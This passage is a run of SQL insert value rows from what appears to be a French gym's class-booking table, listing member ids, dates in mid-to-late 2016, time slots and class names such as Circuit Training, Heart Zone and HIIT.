(7507, 126, 'CTR', '2016-06-22', '19h45', '20h15', 'Circuit Training'),
(7508, 132, 'CTR', '2016-06-22', '19h45', '20h15', 'Circuit Training'),
(7557, 189, 'CTR', '2016-06-23', '12h00', '12h30', 'Circuit training'),
(7510, 173, 'CTR', '2016-06-22', '20h30', '21h', 'Circuit Training'),
(7556, 241, 'CTR', '2016-06-23', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7540, 233, 'CTR', '2016-06-22', '19h45', '20h15', 'Circuit Training'),
(7513, 60, 'CTR', '2016-06-22', '20h30', '21h', 'Circuit Training'),
(7514, 196, 'CTR', '2016-06-22', '20h30', '21h', 'Circuit Training'),
(7515, 188, 'CTR', '2016-06-22', '20h30', '21h', 'Circuit Training'),
(7516, 188, 'CTR', '2016-06-22', '20h30', '21h', 'Circuit Training'),
(7517, 237, 'CTR', '2016-06-21', '19h45', '20h30', 'Circuit Training'),
(7558, 205, 'CTR', '2016-06-23', '12h00', '12h30', 'Circuit training'),
(7519, 237, 'CTR', '2016-06-25', '11h40', '12h10', 'Circuit Niveau 3'),
(7520, 29, 'CTR', '2016-06-16', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7527, 48, 'CTR', '2016-06-18', '10h30', '11h00', 'Circuit Niveau 1'),
(7522, 105, 'CTR', '2016-06-16', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7523, 168, 'CTR', '2016-06-16', '18h15', '18h45', 'Circuit Training'),
(7528, 48, 'CTR', '2016-06-18', '11h05', '11h35', 'Circuit Niveau 2'),
(7525, 205, 'CTR', '2016-06-16', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7526, 205, 'CTR', '2016-06-16', '18h15', '18h45', 'Circuit Training'),
(7529, 31, 'CTR', '2016-06-18', '10h30', '11h00', 'Circuit Niveau 1'),
(7530, 31, 'CTR', '2016-06-18', '11h05', '11h35', 'Circuit Niveau 2'),
(7532, 48, 'CTR', '2016-06-20', '18h45', '19h15', 'Heart Zone partie 2'),
(7534, 205, 'CTR', '2016-06-18', '11h40', '12h10', 'Circuit Niveau 3'),
(7535, 233, 'CTR', '2016-06-18', '11h40', '12h10', 'Circuit Niveau 3'),
(7537, 228, 'CTR', '2016-06-20', '18h15', '18h45', 'Heart Zone partie 1'),
(7539, 228, 'CTR', '2016-06-20', '18h45', '19h15', 'Heart Zone partie 2'),
(7541, 168, 'CTR', '2016-06-20', '17h30', '18h00', 'TRX Suspension Training'),
(7543, 238, 'CTR', '2016-06-21', '19h45', '20h30', 'Circuit Training'),
(7544, 238, 'CTR', '2016-06-23', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7545, 240, 'CTR', '2016-06-21', '19h45', '20h30', 'Circuit Training'),
(7546, 240, 'CTR', '2016-06-23', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7547, 240, 'CTR', '2016-06-25', '11h40', '12h10', 'Circuit Niveau 3'),
(7548, 177, 'CTR', '2016-06-22', '17h30', '18h', 'TRX Suspension Training'),
(7551, 213, 'CTR', '2016-06-26', '10h15', '10h45', 'Duo Training'),
(7552, 213, 'CTR', '2016-06-26', '10h15', '10h45', 'Duo Training'),
(7559, 205, 'CTR', '2016-06-23', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7565, 209, 'CTR', '2016-06-23', '19h00', '19h30', 'Personal Training'),
(7564, 29, 'CTR', '2016-06-23', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7562, 105, 'CTR', '2016-06-23', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7563, 237, 'CTR', '2016-06-23', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(7566, 138, 'CTR', '2016-06-27', '18h15', '18h45', 'Heart Zone partie 1'),
(7567, 138, 'CTR', '2016-06-27', '18h45', '19h15', 'Heart Zone partie 2'),
(7568, 56, 'CTR', '2016-06-27', '18h15', '18h45', 'Heart Zone partie 1'),
(7569, 56, 'CTR', '2016-06-27', '18h45', '19h15', 'Heart Zone partie 2'),
(7570, 56, 'CTR', '2016-06-29', '17h30', '18h', 'TRX Suspension Training'),
(7583, 126, 'CTR', '2016-06-29', '17h30', '18h', 'TRX Suspension Training'),
(7573, 48, 'CTR', '2016-06-27', '18h15', '18h45', 'Heart Zone partie 1'),
(7574, 48, 'CTR', '2016-06-27', '18h45', '19h15', 'Heart Zone partie 2'),
(7575, 210, 'CTR', '2016-06-27', '18h15', '18h45', 'Heart Zone partie 1'),
(7576, 210, 'CTR', '2016-06-27', '18h45', '19h15', 'Heart Zone partie 2'),
(7678, 236, 'CTR', '2016-07-11', '18h45', '19h15', 'Heart Zone partie 2'),
(7676, 236, 'CTR', '2016-07-11', '18h15', '18h45', 'Heart Zone partie 1'),
(7579, 205, 'CTR', '2016-06-27', '17h30', '18h00', 'TRX Suspension Training'),
(7580, 205, 'CTR', '2016-06-27', '18h15', '18h45', 'Heart Zone partie 1'),
(7581, 205, 'CTR', '2016-06-27', '18h45', '19h15', 'Heart Zone partie 2'),
(7582, 237, 'CTR', '2016-06-27', '17h30', '18h00', 'TRX Suspension Training'),
(7584, 177, 'CTR', '2016-06-29', '17h30', '18h', 'TRX Suspension Training'),
(7585, 236, 'CTR', '2016-06-29', '18h15', '18h45', 'Circuit Training'),
(7586, 195, 'CTR', '2016-06-29', '18h15', '18h45', 'Circuit Training'),
(7587, 230, 'CTR', '2016-06-29', '18h15', '18h45', 'Circuit Training'),
(7588, 48, 'CTR', '2016-06-29', '18h15', '18h45', 'Circuit Training'),
(7590, 31, 'CTR', '2016-06-29', '18h15', '18h45', 'Circuit Training'),
(7591, 230, 'CTR', '2016-06-29', '19h ', '19h30', 'Circuit training'),
(7592, 48, 'CTR', '2016-06-29', '19h ', '19h30', 'Circuit training'),
(7593, 31, 'CTR', '2016-06-29', '19h ', '19h30', 'Circuit training'),
(7594, 171, 'CTR', '2016-06-29', '19h ', '19h30', 'Circuit training'),
(7595, 164, 'CTR', '2016-06-29', '19h ', '19h30', 'Circuit training'),
(7596, 173, 'CTR', '2016-06-29', '20h30', '21h', 'Circuit Training'),
(7597, 60, 'CTR', '2016-06-29', '20h30', '21h', 'Circuit Training'),
(7598, 188, 'CTR', '2016-06-29', '20h30', '21h', 'Circuit Training'),
(7599, 188, 'CTR', '2016-06-29', '20h30', '21h', 'Circuit Training'),
(7600, 196, 'CTR', '2016-06-29', '20h30', '21h', 'Circuit Training'),
(7601, 180, 'CTR', '2016-06-29', '20h30', '21h', 'Circuit Training'),
(7602, 103, 'CTR', '2016-06-27', '18h15', '18h45', 'Heart Zone partie 1'),
(7603, 103, 'CTR', '2016-06-27', '18h45', '19h15', 'Heart Zone partie 2'),
(7604, 238, 'CTR', '2016-06-27', '18h45', '19h15', 'Heart Zone partie 2'),
(7605, 30, 'CTR', '2016-06-29', '18h15', '18h45', 'Circuit Training'),
(7606, 30, 'CTR', '2016-06-29', '19h ', '19h30', 'Circuit training'),
(7607, 92, 'CTR', '2016-06-27', '18h15', '18h45', 'Heart Zone partie 1'),
(7608, 92, 'CTR', '2016-06-27', '18h45', '19h15', 'Heart Zone partie 2'),
(7609, 177, 'CTR', '2016-06-27', '18h15', '18h45', 'Heart Zone partie 1'),
(7610, 126, 'CTR', '2016-06-27', '18h15', '18h45', 'Heart Zone partie 1'),
(7611, 132, 'CTR', '2016-06-27', '18h15', '18h45', 'Heart Zone partie 1'),
(7613, 213, 'CTR', '2016-06-29', '19h45', '20h15', 'Circuit Training'),
(7614, 63, 'CTR', '2016-06-29', '17h30', '18h', 'TRX Suspension Training'),
(7670, 213, 'CTR', '2016-07-13', '19h45', '20h15', 'Circuit Training'),
(7671, 230, 'CTR', '2016-07-11', '18h15', '18h45', 'Heart Zone partie 1'),
(7672, 230, 'CTR', '2016-07-11', '18h45', '19h15', 'Heart Zone partie 2'),
(7673, 53, 'CTR', '2016-07-11', '18h15', '18h45', 'Heart Zone partie 1'),
(7674, 53, 'CTR', '2016-07-11', '18h45', '19h15', 'Heart Zone partie 2'),
(7675, 53, 'CTR', '2016-07-11', '19h15', '19h45', 'Explosivité Jambe'),
(7685, 92, 'CTR', '2016-07-11', '18h45', '19h15', 'Heart Zone partie 2'),
(7660, 140, 'CTR', '2016-07-06', '18h15', '18h45', 'Circuit Training'),
(7662, 164, 'CTR', '2016-07-06', '17h30', '18h', 'TRX Suspension Training'),
(7664, 188, 'CTR', '2016-07-06', '19h ', '19h30', 'Circuit training'),
(7665, 188, 'CTR', '2016-07-06', '19h ', '19h30', 'Circuit training'),
(7668, 213, 'CTR', '2016-07-10', '10h15', '10h45', 'Duo Training'),
(7669, 213, 'CTR', '2016-07-10', '10h15', '10h45', 'Duo Training'),
(7641, 236, 'CTR', '2016-07-06', '18h15', '18h45', 'Circuit Training'),
(7642, 195, 'CTR', '2016-07-06', '18h15', '18h45', 'Circuit Training'),
(7684, 92, 'CTR', '2016-07-11', '18h15', '18h45', 'Heart Zone partie 1'),
(7637, 53, 'CTR', '2016-07-06', '17h30', '18h', 'TRX Suspension Training'),
(7638, 177, 'CTR', '2016-07-06', '17h30', '18h', 'TRX Suspension Training'),
(8522, 173, 'lim', '2016-12-09', '12h', '12h45', 'Mercredi oubli inscription'),
(7640, 63, 'CTR', '2016-07-06', '17h30', '18h', 'TRX Suspension Training'),
(7643, 230, 'CTR', '2016-07-06', '18h15', '18h45', 'Circuit Training'),
(7644, 48, 'CTR', '2016-07-06', '18h15', '18h45', 'Circuit Training'),
(7645, 31, 'CTR', '2016-07-06', '18h15', '18h45', 'Circuit Training'),
(7646, 205, 'CTR', '2016-07-06', '18h15', '18h45', 'Circuit Training'),
(7647, 230, 'CTR', '2016-07-06', '19h ', '19h30', 'Circuit training'),
(7648, 48, 'CTR', '2016-07-06', '19h ', '19h30', 'Circuit training'),
(7649, 31, 'CTR', '2016-07-06', '19h ', '19h30', 'Circuit training'),
(7650, 205, 'CTR', '2016-07-06', '19h ', '19h30', 'Circuit training'),
(7663, 188, 'CTR', '2016-07-06', '19h ', '19h30', 'Circuit training'),
(7661, 171, 'CTR', '2016-07-06', '17h30', '18h', 'TRX Suspension Training'),
(7653, 132, 'CTR', '2016-07-06', '20h30', '21h', 'Circuit Training'),
(7666, 48, 'CTR', '2016-07-11', '18h15', '18h45', 'Heart Zone partie 1'),
(7667, 48, 'CTR', '2016-07-11', '18h45', '19h15', 'Heart Zone partie 2'),
(7657, 213, 'CTR', '2016-07-06', '19h45', '20h15', 'Circuit Training'),
(7790, 230, 'CTR', '2016-09-08', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(7680, 195, 'CTR', '2016-07-11', '18h15', '18h45', 'Heart Zone partie 1'),
(7681, 195, 'CTR', '2016-07-11', '18h45', '19h15', 'Heart Zone partie 2'),
(7682, 140, 'CTR', '2016-07-11', '18h15', '18h45', 'Heart Zone partie 1'),
(7683, 140, 'CTR', '2016-07-11', '18h45', '19h15', 'Heart Zone partie 2'),
(7686, 31, 'CTR', '2016-07-11', '18h15', '18h45', 'Heart Zone partie 1'),
(7687, 31, 'CTR', '2016-07-11', '18h45', '19h15', 'Heart Zone partie 2'),
(7688, 180, 'CTR', '2016-07-11', '18h15', '18h45', 'Heart Zone partie 1'),
(7689, 180, 'CTR', '2016-07-11', '18h45', '19h15', 'Heart Zone partie 2'),
(7690, 205, 'CTR', '2016-07-11', '18h15', '18h45', 'Heart Zone partie 1'),
(7691, 205, 'CTR', '2016-07-11', '18h45', '19h15', 'Heart Zone partie 2'),
(7692, 132, 'CTR', '2016-07-11', '19h15', '19h45', 'Explosivité Jambe'),
(7693, 53, 'CTR', '2016-07-13', '17h30', '18h', 'TRX Suspension Training'),
(7694, 205, 'CTR', '2016-07-13', '17h30', '18h', 'TRX Suspension Training'),
(8523, 247, 'lim', '2016-12-09', '12h', '12h45', 'Mercredi oubli inscription'),
(7696, 230, 'CTR', '2016-07-13', '18h15', '18h45', 'Circuit Training'),
(7697, 48, 'CTR', '2016-07-13', '18h15', '18h45', 'Circuit Training'),
(7698, 205, 'CTR', '2016-07-13', '18h15', '18h45', 'Circuit Training'),
(7699, 31, 'CTR', '2016-07-13', '18h15', '18h45', 'Circuit Training'),
(7700, 236, 'CTR', '2016-07-13', '18h15', '18h45', 'Circuit Training'),
(7701, 195, 'CTR', '2016-07-13', '18h15', '18h45', 'Circuit Training'),
(7702, 230, 'CTR', '2016-07-13', '19h ', '19h30', 'Circuit training'),
(7703, 48, 'CTR', '2016-07-13', '19h ', '19h30', 'Circuit training'),
(7704, 31, 'CTR', '2016-07-13', '19h ', '19h30', 'Circuit training'),
(7705, 132, 'CTR', '2016-07-13', '19h ', '19h30', 'Circuit training'),
(7706, 177, 'CTR', '2016-07-11', '19h15', '19h45', 'Explosivité Jambe'),
(7707, 241, 'CTR', '2016-07-11', '19h15', '19h45', 'Explosivité Jambe'),
(7708, 180, 'CTR', '2016-07-13', '18h15', '18h45', 'Circuit Training'),
(7712, 177, 'CTR', '2016-07-13', '19h ', '19h30', 'Circuit training'),
(7710, 138, 'CTR', '2016-07-13', '19h ', '19h30', 'Circuit training'),
(7711, 241, 'CTR', '2016-07-13', '17h30', '18h', 'TRX Suspension Training'),
(7713, 80, 'CTR', '2016-07-13', '17h30', '18h', 'TRX Suspension Training'),
(7728, 180, 'CTR', '2016-08-24', '18h15', '18h45', 'Circuit Traing'),
(7726, 138, 'CTR', '2016-08-24', '19h ', '19h30', 'Circuit training'),
(7727, 31, 'CTR', '2016-08-24', '18h15', '18h45', 'Circuit Traing'),
(7723, 31, 'CTR', '2016-08-24', '19h ', '19h30', 'Circuit training'),
(7724, 48, 'CTR', '2016-08-24', '19h ', '19h30', 'Circuit training'),
(7731, 231, 'CTR', '2016-08-24', '18h15', '18h45', 'Circuit Traing'),
(7729, 48, 'CTR', '2016-08-24', '18h15', '18h45', 'Circuit Traing'),
(7730, 164, 'CTR', '2016-08-24', '19h ', '19h30', 'Circuit training'),
(7732, 240, 'CTR', '2016-08-24', '18h15', '18h45', 'Circuit Traing'),
(7733, 48, 'CTR', '2016-08-31', '18h15', '18h45', 'Circuit Traing'),
(7734, 48, 'CTR', '2016-08-31', '19h ', '19h30', 'Circuit training'),
(7735, 31, 'CTR', '2016-08-31', '19h ', '19h30', 'Circuit training'),
(7736, 31, 'CTR', '2016-08-31', '18h15', '18h45', 'Circuit Traing'),
(7737, 240, 'CTR', '2016-08-31', '18h15', '18h45', 'Circuit Traing'),
(7738, 140, 'CTR', '2016-08-31', '18h15', '18h45', 'Circuit Traing'),
(7739, 230, 'CTR', '2016-08-31', '18h15', '18h45', 'Circuit Traing'),
(7740, 230, 'CTR', '2016-08-31', '19h ', '19h30', 'Circuit training'),
(7741, 177, 'CTR', '2016-08-31', '18h15', '18h45', 'Circuit Traing'),
(7742, 164, 'CTR', '2016-08-31', '19h ', '19h30', 'Circuit training'),
(7743, 180, 'CTR', '2016-08-31', '18h15', '18h45', 'Circuit Traing'),
(7744, 132, 'CTR', '2016-08-31', '19h ', '19h30', 'Circuit training'),
(7745, 231, 'CTR', '2016-08-31', '18h15', '18h45', 'Circuit Traing'),
(7746, 230, 'CTR', '2016-09-07', '19h ', '19h30', 'Circuit training'),
(7747, 230, 'CTR', '2016-09-07', '18h15', '18h45', 'Circuit Traing'),
(7748, 180, 'CTR', '2016-09-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7749, 180, 'CTR', '2016-09-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7750, 213, 'CTR', '2016-09-06', '19h15', '19h45', 'Duo Training'),
(7802, 80, 'CTR', '2016-09-07', '20h30', '21h00', 'Circuit Training'),
(7752, 180, 'CTR', '2016-09-07', '20h30', '21h00', 'Circuit Training'),
(7753, 173, 'CTR', '2016-09-07', '20h30', '21h00', 'Circuit Training'),
(8524, 189, 'lim', '2016-12-09', '12h', '12h45', 'Mercredi oubli inscription'),
(7898, 230, 'CTR', '2016-09-22', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(7807, 180, 'CTR', '2016-09-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7848, 140, 'CTR', '2016-09-14', '18h15', '18h45', 'Circuit Training'),
(7962, 230, 'CTR', '2016-10-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7852, 195, 'CTR', '2016-09-14', '19h ', '19h30', 'Circuit training'),
(7762, 132, 'CTR', '2016-09-05', '19h30', '20h00', 'Circuit Training'),
(7763, 31, 'CTR', '2016-09-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7764, 31, 'CTR', '2016-09-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7765, 48, 'CTR', '2016-09-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7766, 48, 'CTR', '2016-09-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7767, 31, 'CTR', '2016-09-07', '18h15', '18h45', 'Circuit Training'),
(7768, 31, 'CTR', '2016-09-07', '19h ', '19h30', 'Circuit training'),
(7769, 31, 'CTR', '2016-09-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7770, 31, 'CTR', '2016-09-09', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7771, 138, 'CTR', '2016-09-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7772, 138, 'CTR', '2016-09-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7794, 205, 'CTR', '2016-09-07', '19h ', '19h30', 'Circuit training'),
(7774, 240, 'CTR', '2016-09-08', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(7808, 180, 'CTR', '2016-09-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7776, 211, 'CTR', '2016-09-08', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(7777, 244, 'CTR', '2016-09-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7778, 244, 'CTR', '2016-09-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7779, 230, 'CTR', '2016-09-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7780, 230, 'CTR', '2016-09-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7793, 205, 'CTR', '2016-09-07', '18h15', '18h45', 'Circuit Training'),
(7791, 231, 'CTR', '2016-09-07', '18h15', '18h45', 'Circuit Training'),
(7783, 205, 'CTR', '2016-09-05', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7784, 205, 'CTR', '2016-09-05', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7785, 235, 'CTR', '2016-09-12', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(7908, 240, 'CTR', '2016-09-29', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(7787, 235, 'CTR', '2016-09-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(7795, 205, 'CTR', '2016-09-08', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(7801, 48, 'CTR', '2016-09-07', '19h ', '19h30', 'Circuit training'),
(7800, 48, 'CTR', '2016-09-07', '18h15', '18h45', 'Circuit Training'),
(7799, 240, 'CTR', '2016-09-07', '18h15', '18h45', 'Circuit Training'),
(7812, 48, 'CTR', '2016-09-09', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7810, 240, 'CTR', '2016-09-15', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(7811, 240, 'CTR', '2016-09-14', '18h15', '18h45', 'Circuit Training'),
(7813, 48, 'CTR', '2016-09-09', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7814, 231, 'CTR', '2016-09-12', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(7866, 60, 'CTR', '2016-09-21', '20h30', '21h00', 'Circuit Training'),
(7867, 188, 'CTR', '2016-09-21', '20h30', '21h00', 'Circuit Training'),
(7863, 180, 'CTR', '2016-09-21', '20h30', '21h00', 'Circuit Training'),
(7819, 173, 'CTR', '2016-09-14', '20h30', '21h00', 'Circuit Training'),
(7820, 180, 'CTR', '2016-09-14', '20h30', '21h00', 'Circuit Training'),
(7831, 60, 'CTR', '2016-09-14', '20h30', '21h00', 'Circuit Training'),
(7822, 48, 'CTR', '2016-09-14', '18h15', '18h45', 'Circuit Training'),
(7823, 48, 'CTR', '2016-09-14', '19h ', '19h30', 'Circuit training'),
(7824, 31, 'CTR', '2016-09-14', '18h15', '18h45', 'Circuit Training'),
(7825, 31, 'CTR', '2016-09-14', '19h ', '19h30', 'Circuit training'),
(7864, 173, 'CTR', '2016-09-21', '20h30', '21h00', 'Circuit Training'),
(7828, 205, 'CTR', '2016-09-14', '18h15', '18h45', 'Circuit Training'),
(7829, 205, 'CTR', '2016-09-14', '19h ', '19h30', 'Circuit training'),
(7830, 220, 'CTR', '2016-09-14', '19h45', '20h15', 'Personal Training'),
(7847, 177, 'CTR', '2016-09-14', '18h15', '18h45', 'Circuit Training'),
(7853, 180, 'CTR', '2016-09-15', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(7835, 132, 'CTR', '2016-09-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7836, 132, 'CTR', '2016-09-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7837, 205, 'CTR', '2016-09-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7838, 205, 'CTR', '2016-09-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7839, 230, 'CTR', '2016-09-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7840, 230, 'CTR', '2016-09-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7841, 230, 'CTR', '2016-09-15', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(7856, 210, 'CTR', '2016-09-16', '17h30', '18h00', 'Circuit Training'),
(7855, 192, 'CTR', '2016-09-16', '17h30', '18h00', 'Circuit Training'),
(7844, 48, 'CTR', '2016-09-12', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7845, 48, 'CTR', '2016-09-12', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7907, 240, 'CTR', '2016-09-28', '18h15', '18h45', 'Circuit Training'),
(7859, 31, 'CTR', '2016-09-16', '17h30', '18h00', 'Circuit Training'),
(7860, 48, 'CTR', '2016-09-16', '17h30', '18h00', 'Circuit Training'),
(7861, 205, 'CTR', '2016-09-15', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(7862, 209, 'CTR', '2016-09-15', '19h15', '19h45', 'Personal Training'),
(7868, 188, 'CTR', '2016-09-21', '20h30', '21h00', 'Circuit Training'),
(7869, 188, 'CTR', '2016-09-21', '20h30', '21h00', 'Circuit Training'),
(7905, 192, 'CTR', '2016-09-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7899, 211, 'CTR', '2016-09-22', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(7897, 132, 'CTR', '2016-09-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7873, 240, 'CTR', '2016-09-22', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(7875, 240, 'CTR', '2016-09-21', '18h15', '18h45', 'Circuit Training'),
(7878, 205, 'CTR', '2016-09-16', '17h30', '18h00', 'Circuit Training'),
(7879, 247, 'CTR', '2016-09-21', '20h30', '21h00', 'Circuit Training'),
(7880, 48, 'CTR', '2016-09-21', '18h15', '18h45', 'Circuit Training'),
(7881, 48, 'CTR', '2016-09-21', '19h ', '19h30', 'Circuit training'),
(7882, 31, 'CTR', '2016-09-21', '18h15', '18h45', 'Circuit Training'),
(7883, 31, 'CTR', '2016-09-21', '19h ', '19h30', 'Circuit training'),
(7884, 177, 'CTR', '2016-09-21', '18h15', '18h45', 'Circuit Training'),
(7885, 140, 'CTR', '2016-09-21', '18h15', '18h45', 'Circuit Training'),
(7886, 205, 'CTR', '2016-09-21', '18h15', '18h45', 'Circuit Training'),
(7887, 205, 'CTR', '2016-09-21', '19h ', '19h30', 'Circuit training'),
(7888, 230, 'CTR', '2016-09-21', '18h15', '18h45', 'Circuit Training'),
(7889, 230, 'CTR', '2016-09-21', '19h ', '19h30', 'Circuit training'),
(7890, 195, 'CTR', '2016-09-21', '19h ', '19h30', 'Circuit training'),
(7891, 205, 'CTR', '2016-09-22', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(7906, 192, 'CTR', '2016-09-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7903, 233, 'CTR', '2016-09-21', '20h30', '21h00', 'Circuit Training'),
(7894, 228, 'CTR', '2016-09-21', '18h15', '18h45', 'Circuit Training'),
(7895, 228, 'CTR', '2016-09-21', '19h ', '19h30', 'Circuit training'),
(7909, 48, 'CTR', '2016-09-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7910, 48, 'CTR', '2016-09-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7911, 31, 'CTR', '2016-09-23', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7912, 31, 'CTR', '2016-09-23', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7913, 31, 'CTR', '2016-09-28', '18h15', '18h45', 'Circuit Training'),
(7964, 31, 'CTR', '2016-09-28', '19h ', '19h30', 'Circuit training'),
(7915, 205, 'CTR', '2016-09-23', '17h30', '18h00', 'Circuit Training'),
(7916, 205, 'CTR', '2016-09-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7917, 205, 'CTR', '2016-09-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7918, 191, 'CTR', '2016-09-23', '17h30', '18h00', 'Circuit Training'),
(7919, 48, 'CTR', '2016-09-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7920, 48, 'CTR', '2016-09-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7921, 230, 'CTR', '2016-09-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7922, 230, 'CTR', '2016-09-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7923, 231, 'CTR', '2016-09-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(7963, 230, 'CTR', '2016-10-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7925, 132, 'CTR', '2016-09-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7926, 180, 'CTR', '2016-09-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7927, 180, 'CTR', '2016-09-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7928, 48, 'CTR', '2016-09-28', '18h15', '18h45', 'Circuit Training'),
(7965, 48, 'CTR', '2016-09-28', '19h ', '19h30', 'Circuit training'),
(7930, 140, 'CTR', '2016-09-28', '18h15', '18h45', 'Circuit Training'),
(7932, 205, 'CTR', '2016-09-28', '18h15', '18h45', 'Circuit Training'),
(8016, 240, 'CTR', '2016-10-06', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(7937, 205, 'CTR', '2016-09-28', '19h ', '19h30', 'Circuit training'),
(7961, 230, 'CTR', '2016-10-06', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8015, 240, 'CTR', '2016-10-05', '18h15', '18h45', 'Circuit Training'),
(7968, 180, 'CTR', '2016-09-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7967, 180, 'CTR', '2016-09-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7942, 188, 'CTR', '2016-09-28', '20h30', '21h00', 'Circuit Training'),
(7943, 180, 'CTR', '2016-09-28', '20h30', '21h00', 'Circuit Training'),
(7944, 173, 'CTR', '2016-09-28', '20h30', '21h00', 'Circuit Training'),
(8525, 195, 'lim', '2016-12-09', '12h', '12h45', 'Mercredi oubli inscription'),
(7946, 60, 'CTR', '2016-09-28', '20h30', '21h00', 'Circuit Training'),
(7947, 3, 'CTR', '2016-09-28', '20h30', '21h00', 'Circuit Training'),
(7948, 191, 'CTR', '2016-09-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(7949, 188, 'CTR', '2016-09-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(7950, 188, 'CTR', '2016-09-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(7951, 188, 'CTR', '2016-09-26', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(7952, 235, 'CTR', '2016-10-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8088, 48, 'CTR', '2016-10-10', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7954, 235, 'CTR', '2016-10-17', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(7955, 56, 'CTR', '2016-09-26', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7956, 56, 'CTR', '2016-09-26', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8040, 213, 'CTR', '2016-10-04', '19h15', '19h45', 'Duo Training'),
(8041, 180, 'CTR', '2016-10-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7969, 3, 'CTR', '2016-09-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
